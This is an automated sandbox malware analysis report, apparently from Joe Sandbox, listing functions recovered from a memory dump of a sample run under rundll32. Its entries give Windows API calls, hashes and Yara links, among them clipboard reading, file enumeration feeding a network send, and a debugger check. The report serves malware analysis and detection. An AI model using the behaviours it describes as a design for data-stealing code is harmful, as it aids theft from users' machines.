                                      • Instruction Fuzzy Hash: 4031D370D44615DFCB21DF68DDC086ABBB8FF057A07584AEEE8619B290DB308D14EB50
                                      Function 02B520C3 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 02B48215: GetLastError.KERNEL32(00000020,?,02B3A7F5,?,?,?,02B3F9A8,?,?,00000020,00000000,?,?,?,02B2DD01,0000003B), ref: 02B48219
                                        • Part of subcall function 02B48215: _free.LIBCMT ref: 02B4824C
                                        • Part of subcall function 02B48215: SetLastError.KERNEL32(00000000,02B3F9A8,?,?,00000020,00000000,?,?,?,02B2DD01,0000003B,?,00000041,00000000,00000000), ref: 02B4828D
                                        • Part of subcall function 02B48215: _abort.LIBCMT ref: 02B48293
                                        • Part of subcall function 02B48215: _free.LIBCMT ref: 02B48274
                                        • Part of subcall function 02B48215: SetLastError.KERNEL32(00000000,02B3F9A8,?,?,00000020,00000000,?,?,?,02B2DD01,0000003B,?,00000041,00000000,00000000), ref: 02B48281
                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 02B52117
                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 02B52168
                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 02B52228
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorInfoLastLocale$_free$_abort
                                      • String ID:
                                      • API String ID: 2829624132-0
                                      • Opcode ID: a3983d7936f242910e634bb54f237ab40a435756210ed33d284e1c884d3b98ba
                                      • Instruction ID: ec4998ef728d6908ef3f6cbbeb9e92c7d6fa60ba52f7c351b30cd7819c13311a
                                      • Opcode Fuzzy Hash: a3983d7936f242910e634bb54f237ab40a435756210ed33d284e1c884d3b98ba
                                      • Instruction Fuzzy Hash: AA61B1759412279BDB289F28CC82BBAB7A9FF04300F1081E9EE15CE584FB359991DF50
                                      Function 02B3BB22 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • IsDebuggerPresent.KERNEL32 ref: 02B3BC1A
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 02B3BC24
                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 02B3BC31
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                      • String ID:
                                      • API String ID: 3906539128-0
                                      • Opcode ID: c6118bb927885769268a4f29ccd3c7827fcd00306451bb9d345dc41e347bc3b7
                                      • Instruction ID: 154067fd355044cc5f8a564cbfd3300472dc721565a58f327b44fa4d07cc3c96
                                      • Opcode Fuzzy Hash: c6118bb927885769268a4f29ccd3c7827fcd00306451bb9d345dc41e347bc3b7
                                      • Instruction Fuzzy Hash: 3C31B27594122CABCB26DF64D988BDDBBB8EF08310F5045EAE41CA7250EB349B858F44
                                      Function 02B33837 Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,02B334BF,00000034,?,?,00000000), ref: 02B33849
                                      • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,02B33552,00000000,?,00000000), ref: 02B3385F
                                      • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,02B33552,00000000,?,00000000,02B1E251), ref: 02B33871
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Crypt$Context$AcquireRandomRelease
                                      • String ID:
                                      • API String ID: 1815803762-0
                                      • Opcode ID: d83441e532c4a3fd9d844df1990869dea513eed5a441780e63aca09e3e859f40
                                      • Instruction ID: bc291de41539417db6da0cd2b607a19cf17eb3b692c6580c5020438751a4b465
                                      • Opcode Fuzzy Hash: d83441e532c4a3fd9d844df1990869dea513eed5a441780e63aca09e3e859f40
                                      • Instruction Fuzzy Hash: F4E06D31248220FBFB320E25AC18F573AA5EF817A1F240DB9B211A90D4E2529450C694
                                      Function 02B432B5 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32(?,?,02B4328B,?), ref: 02B432D6
                                      • TerminateProcess.KERNEL32(00000000,?,02B4328B,?), ref: 02B432DD
                                      • ExitProcess.KERNEL32 ref: 02B432EF
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$CurrentExitTerminate
                                      • String ID:
                                      • API String ID: 1703294689-0
                                      • Opcode ID: b1178ac95ef14d18ebaf2cc1166b4413477be026b1b5352dd2fc1d978da8fcee
                                      • Instruction ID: 3a2873855cbcf56265b20208cb57ddb5a792888a04e29a085b29d7aa187a1c66
                                      • Opcode Fuzzy Hash: b1178ac95ef14d18ebaf2cc1166b4413477be026b1b5352dd2fc1d978da8fcee
                                      • Instruction Fuzzy Hash: B8E04F31840644EBCF026F54D849B993BAAFB40385F144494F9494B121CF36D952DA80
                                      Function 02B0B70E Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • OpenClipboard.USER32(00000000), ref: 02B0B711
                                      • GetClipboardData.USER32(0000000D), ref: 02B0B71D
                                      • CloseClipboard.USER32 ref: 02B0B725
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Clipboard$CloseDataOpen
                                      • String ID:
                                      • API String ID: 2058664381-0
                                      • Opcode ID: 800f542fc3a42c7b97b32a0c1767cf0d9a31f64cebc4e448fb253bb78dc04814
                                      • Instruction ID: 5807c9107465727baa6106c6287e7d19a01505ddaabf14cb58ae67ca9a9eb6e3
                                      • Opcode Fuzzy Hash: 800f542fc3a42c7b97b32a0c1767cf0d9a31f64cebc4e448fb253bb78dc04814
                                      • Instruction Fuzzy Hash: B1E08C32B85320EFD2219B609888B9A6F64EF61F95F00C898B505AF1C4C7209C00C6A0
                                      Function 02B488ED Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,02B444CA,?,00000004), ref: 02B48940
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InfoLocale
                                      • String ID: GetLocaleInfoEx
                                      • API String ID: 2299586839-2904428671
                                      • Opcode ID: 2a5500785966d4ec14253555da798408a597e75ad56434f1607063bd2bcdb16e
                                      • Instruction ID: b209140c6577f7de335730e5aba81d39ec7e0df05af8326400893b2338fa422e
                                      • Opcode Fuzzy Hash: 2a5500785966d4ec14253555da798408a597e75ad56434f1607063bd2bcdb16e
                                      • Instruction Fuzzy Hash: C2F09031A81628FBEB11AF60DC45F6E7B66EF08B90F044594FC0A6B260CE715D20AAD5
                                      Function 02B461F0 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
                                      • Instruction ID: 53d6eb481f67a0115cf0fc331e52eb536aba5f1286f5160829503d357d6edef5
                                      • Opcode Fuzzy Hash: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
                                      • Instruction Fuzzy Hash: 64023C71E002199BDF14CFA9C8C06AEF7F5EF49324F1581A9D919E7345DB31AA41DB80
                                      Function 02B19AF5 Relevance: 3.2, APIs: 2, Instructions: 245fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileW.KERNEL32(00000000,?), ref: 02B19D4B
                                      • FindNextFileW.KERNEL32(00000000,?,?), ref: 02B19E17
                                        • Part of subcall function 02B1C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,02B0A843), ref: 02B1C49E
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$Find$CreateFirstNext
                                      • String ID:
                                      • API String ID: 341183262-0
                                      • Opcode ID: e8ffaa386661502d34133aec4c7f1a8aa6dcef1ecf3eba998e9a012c6a576c65
                                      • Instruction ID: e0f2aeacd624f7e82b82245028b937d7661230b05a402d5f6fa2ced340b1008f
                                      • Opcode Fuzzy Hash: e8ffaa386661502d34133aec4c7f1a8aa6dcef1ecf3eba998e9a012c6a576c65
                                      • Instruction Fuzzy Hash: 7B8164325182409BD31AFB24C8D4EEFBBAAAF90340F90499DE55A571E4EF30994DCF52
                                      Function 02B0783C Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 02B07857
                                      • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 02B0791F
                                        • Part of subcall function 02B04AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02B04B36
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileFind$FirstNextsend
                                      • String ID:
                                      • API String ID: 4113138495-0
                                      • Opcode ID: eb20020f9442aeb2cc1bab91c8eb519cd503fb0fda51adeb990d37cf5d82b0c6
                                      • Instruction ID: 41e97b7f6355784c21643c8194e11de4b20586b6ee6a58918b1d42442f545ea4
                                      • Opcode Fuzzy Hash: eb20020f9442aeb2cc1bab91c8eb519cd503fb0fda51adeb990d37cf5d82b0c6
                                      • Instruction Fuzzy Hash: 9E2182325143449BC31AFB64D8D4DAFFBAEAF94354F400999EA96520D0FF34AA0CCE52
                                      Function 02B12077 Relevance: 2.6, APIs: 2, Instructions: 55memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,02B11F37,?,?,?,?,?), ref: 02B120E7
                                      • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 02B120EE
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$FreeProcess
                                      • String ID:
                                      • API String ID: 3859560861-0
                                      • Opcode ID: c668269754ab9e0c98fa4fb9efb731f63d73c8b7d45b594b55f82cf7ff8910c2
                                      • Instruction ID: 8211ade124fcffce37d98e2e52f4f561b23844a2dea778df4f1d66bcfafebb1f
                                      • Opcode Fuzzy Hash: c668269754ab9e0c98fa4fb9efb731f63d73c8b7d45b594b55f82cf7ff8910c2
                                      • Instruction Fuzzy Hash: D4113932400B21EFDB319F64DD88817BBEAFF0472934489AEE59656925CB32F890CF50
                                      Function 02B5332B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,02B53326,?,?,00000008,?,?,02B561DD,00000000), ref: 02B53558
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExceptionRaise
                                      • String ID:
                                      • API String ID: 3997070919-0
                                      • Opcode ID: 94e4edcfb6084499b9d3506e1e7d535d6918e26a08ed77ed3ccf3caa75e5ec9b
                                      • Instruction ID: c63019a798be71b51d1436d43dcad56c57383fdc4584b7cd3bb92c6cf6748cd0
                                      • Opcode Fuzzy Hash: 94e4edcfb6084499b9d3506e1e7d535d6918e26a08ed77ed3ccf3caa75e5ec9b
                                      • Instruction Fuzzy Hash: A5B119716106189FD715CF28C48AB657BE0FF453A8F2986D8E89ACF3A2C735D991CB40
                                      Function 02B33946 Relevance: 1.8, Strings: 1, Instructions: 501COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: 0
                                      • API String ID: 0-4108050209
                                      • Opcode ID: 161c2a9fa235f42a7a6e51caa974e13f0d0d96d3da881d374ebb7ed1edd14636
                                      • Instruction ID: b8b60288d4510ff13d5dae5bad53c18b84d90be7c735d5cc0dbe42c94e50229d
                                      • Opcode Fuzzy Hash: 161c2a9fa235f42a7a6e51caa974e13f0d0d96d3da881d374ebb7ed1edd14636
                                      • Instruction Fuzzy Hash: 67126A36B083008BD714DF69D851A1FB7E3BFCC754F15896EE589AB290DA34E8058F86
                                      Function 02B34C52 Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                      Download Yara Rule
                                      APIs
                                      • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 02B34C6B
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FeaturePresentProcessor
                                      • String ID:
                                      • API String ID: 2325560087-0
                                      • Opcode ID: 0e7c22acf123d4c00c5d4e1fbae353f0f65e2dbc395de132dcd944f7fba4ba6b
                                      • Instruction ID: d2065dc3fa68d463455cbe3729c121108b9f2ebec00dc76e8b2bdb8c8a5119f5
                                      • Opcode Fuzzy Hash: 0e7c22acf123d4c00c5d4e1fbae353f0f65e2dbc395de132dcd944f7fba4ba6b
                                      • Instruction Fuzzy Hash: 0551B171D102089FEB15CF6DD58579EBBF4FB08394F2484AAD819EB240D3349A54CFA0
                                      Function 02B52313 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 02B48215: GetLastError.KERNEL32(00000020,?,02B3A7F5,?,?,?,02B3F9A8,?,?,00000020,00000000,?,?,?,02B2DD01,0000003B), ref: 02B48219
                                        • Part of subcall function 02B48215: _free.LIBCMT ref: 02B4824C
                                        • Part of subcall function 02B48215: SetLastError.KERNEL32(00000000,02B3F9A8,?,?,00000020,00000000,?,?,?,02B2DD01,0000003B,?,00000041,00000000,00000000), ref: 02B4828D
                                        • Part of subcall function 02B48215: _abort.LIBCMT ref: 02B48293
                                        • Part of subcall function 02B48215: _free.LIBCMT ref: 02B48274
                                        • Part of subcall function 02B48215: SetLastError.KERNEL32(00000000,02B3F9A8,?,?,00000020,00000000,?,?,?,02B2DD01,0000003B,?,00000041,00000000,00000000), ref: 02B48281
                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 02B52367
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast$_free$InfoLocale_abort
                                      • String ID:
                                      • API String ID: 1663032902-0
                                      • Opcode ID: d1951e0a2538e2a7385e2037f269237380432e59de838c0e58c47dc5d081c196
                                      • Instruction ID: c4c99f2b41f0636000961065c320efde82ec978b666a9117f0b8346840f9dc10
                                      • Opcode Fuzzy Hash: d1951e0a2538e2a7385e2037f269237380432e59de838c0e58c47dc5d081c196
                                      • Instruction Fuzzy Hash: 02219532951226AFDB249E24DC45BBA73A9EF04310F1441FAED05EB240EB759954CB60
                                      Function 02B51F9B Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 02B48215: GetLastError.KERNEL32(00000020,?,02B3A7F5,?,?,?,02B3F9A8,?,?,00000020,00000000,?,?,?,02B2DD01,0000003B), ref: 02B48219
                                        • Part of subcall function 02B48215: _free.LIBCMT ref: 02B4824C
                                        • Part of subcall function 02B48215: SetLastError.KERNEL32(00000000,02B3F9A8,?,?,00000020,00000000,?,?,?,02B2DD01,0000003B,?,00000041,00000000,00000000), ref: 02B4828D
                                        • Part of subcall function 02B48215: _abort.LIBCMT ref: 02B48293
                                      • EnumSystemLocalesW.KERNEL32(02B520C3,00000001), ref: 02B5200D
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                      • String ID:
                                      • API String ID: 1084509184-0
                                      • Opcode ID: e632c6fc1efdab7964080022d73dad7499992406afe1420c3d02f2a837409985
                                      • Instruction ID: 91e909c1150d1b1fa228ec48176d5064c7defd93d8c006da82a905c06a406d7b
                                      • Opcode Fuzzy Hash: e632c6fc1efdab7964080022d73dad7499992406afe1420c3d02f2a837409985
                                      • Instruction Fuzzy Hash: 351125372017019FEB189F39C8917BABB92FF80358B18486DED878BA00D771A942CB40
                                      Function 02B52543 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 02B48215: GetLastError.KERNEL32(00000020,?,02B3A7F5,?,?,?,02B3F9A8,?,?,00000020,00000000,?,?,?,02B2DD01,0000003B), ref: 02B48219
                                        • Part of subcall function 02B48215: _free.LIBCMT ref: 02B4824C
                                        • Part of subcall function 02B48215: SetLastError.KERNEL32(00000000,02B3F9A8,?,?,00000020,00000000,?,?,?,02B2DD01,0000003B,?,00000041,00000000,00000000), ref: 02B4828D
                                        • Part of subcall function 02B48215: _abort.LIBCMT ref: 02B48293
                                      • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,02B522E1,00000000,00000000,?), ref: 02B5256F
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast$InfoLocale_abort_free
                                      • String ID:
                                      • API String ID: 2692324296-0
                                      • Opcode ID: 200a127b22643697b3d0696e896c5472d5acbdf1c1741c86915e70d5a53f5124
                                      • Instruction ID: 16c9bcaea8f0236d101df2a7bfce858fb82df8fd24cc380959733d92e2716603
                                      • Opcode Fuzzy Hash: 200a127b22643697b3d0696e896c5472d5acbdf1c1741c86915e70d5a53f5124
                                      • Instruction Fuzzy Hash: E6F07D32D41136BBDB245B20DC66BBA7768EF40354F0444A9EC15A7140EB74FD41CAD0
                                      Function 02B52036 Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 02B48215: GetLastError.KERNEL32(00000020,?,02B3A7F5,?,?,?,02B3F9A8,?,?,00000020,00000000,?,?,?,02B2DD01,0000003B), ref: 02B48219
                                        • Part of subcall function 02B48215: _free.LIBCMT ref: 02B4824C
                                        • Part of subcall function 02B48215: SetLastError.KERNEL32(00000000,02B3F9A8,?,?,00000020,00000000,?,?,?,02B2DD01,0000003B,?,00000041,00000000,00000000), ref: 02B4828D
                                        • Part of subcall function 02B48215: _abort.LIBCMT ref: 02B48293
                                      • EnumSystemLocalesW.KERNEL32(02B52313,00000001), ref: 02B52082
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                      • String ID:
                                      • API String ID: 1084509184-0
                                      • Opcode ID: c12a2f8eceb1b4319e3fd951534874d67ff3df19ed25ca0c1b50e61fce923d23
                                      • Instruction ID: 3d0e70f67c1d867c09d518f69c3a347b24bb7bc32dcd23ddd0a331498369ffd7
                                      • Opcode Fuzzy Hash: c12a2f8eceb1b4319e3fd951534874d67ff3df19ed25ca0c1b50e61fce923d23
                                      • Instruction Fuzzy Hash: 4AF046323027145FDB245F39CC81B7A7B95FF80368B0884ACFD428F640D7B1A802DA40
                                      Function 02B48404 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 02B45888: EnterCriticalSection.KERNEL32(-0006D41D,?,02B42FDB,00000000,02B6E928,0000000C,02B42F96,?,?,?,02B45B26,?,?,02B482CA,00000001,00000364), ref: 02B45897
                                      • EnumSystemLocalesW.KERNEL32(Function_000483BE,00000001,02B6EAD0,0000000C), ref: 02B4843C
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CriticalEnterEnumLocalesSectionSystem
                                      • String ID:
                                      • API String ID: 1272433827-0
                                      • Opcode ID: 224f1e890231d519724172dff5eb722c771958bb243ee035c95dcccc578873e0
                                      • Instruction ID: 5ca712dca6f72aff608f09533f174744ef6fce85206238bcb1645654616f567a
                                      • Opcode Fuzzy Hash: 224f1e890231d519724172dff5eb722c771958bb243ee035c95dcccc578873e0
                                      • Instruction Fuzzy Hash: 5AF0CD72AA0204EFEB10EF78D885B8D37F2EB04361F0089A5F810DB2A1CF7489649F50
                                      Function 02B51F50 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 02B48215: GetLastError.KERNEL32(00000020,?,02B3A7F5,?,?,?,02B3F9A8,?,?,00000020,00000000,?,?,?,02B2DD01,0000003B), ref: 02B48219
                                        • Part of subcall function 02B48215: _free.LIBCMT ref: 02B4824C
                                        • Part of subcall function 02B48215: SetLastError.KERNEL32(00000000,02B3F9A8,?,?,00000020,00000000,?,?,?,02B2DD01,0000003B,?,00000041,00000000,00000000), ref: 02B4828D
                                        • Part of subcall function 02B48215: _abort.LIBCMT ref: 02B48293
                                      • EnumSystemLocalesW.KERNEL32(02B51EA7,00000001), ref: 02B51F87
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                      • String ID:
                                      • API String ID: 1084509184-0
                                      • Opcode ID: 5458c78d506ec17a31e2abc508d6cb95f1c77d858cb28b61b3cd8988c9443bc6
                                      • Instruction ID: f9506f812fc1683dd32921d9f8d35f5c180b67ad9f0f8ab7552411107f0e8954
                                      • Opcode Fuzzy Hash: 5458c78d506ec17a31e2abc508d6cb95f1c77d858cb28b61b3cd8988c9443bc6
                                      • Instruction Fuzzy Hash: 80F0553674031597CB04AF39C848B7A7F91EFC2724B060098EE098F640C7729842CB90
                                      Function 02B34B47 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetUnhandledExceptionFilter.KERNEL32(Function_00034B53,02B3487A), ref: 02B34B4C
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      • Opcode ID: f19764307fc03b1f8458bfe2be2c56a2555579664ffe045f6a38b9f903e46b20
                                      • Instruction ID: e01bf7d6e6f9428a331fafe231499a59c862b339cd9ccb112e09cf58a6609cb8
                                      • Opcode Fuzzy Hash: f19764307fc03b1f8458bfe2be2c56a2555579664ffe045f6a38b9f903e46b20
                                      • Instruction Fuzzy Hash:
                                      Function 02B3E0CC Relevance: 1.5, Strings: 1, Instructions: 214COMMONLIBRARYCODE
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: 0
                                      • API String ID: 0-4108050209
                                      • Opcode ID: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                      • Instruction ID: dcc9bd86c33d59dae43b36e9b4785c5bb44c019b53badc8a613cc9b161b88877
                                      • Opcode Fuzzy Hash: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                      • Instruction Fuzzy Hash: 63511671600E48A7DF3F89A88C557BE778AEF42248F0809CBD8C2DB681C715E981C752
                                      Function 02B27A46 Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: @
                                      • API String ID: 0-2766056989
                                      • Opcode ID: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
                                      • Instruction ID: a09cf17d9ce9c5131098651da61d62bda5e69b5d2f884ddbc9360a54ba046cd1
                                      • Opcode Fuzzy Hash: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
                                      • Instruction Fuzzy Hash: 9D4136719183458BC340CF29C48020AFBE1FFD8318F649A5EF899A3250D775EA86CB86
                                      Function 02B4D9C9 Relevance: .6, Instructions: 637COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2a613c30e5a16bd4d588c7ae19852a1078ad5abf58f91c7035bae8ded5a68252
                                      • Instruction ID: e9cf1fd5249ca6461d1a097514a4371758c9139c69a1bbee74f0778c5516edde
                                      • Opcode Fuzzy Hash: 2a613c30e5a16bd4d588c7ae19852a1078ad5abf58f91c7035bae8ded5a68252
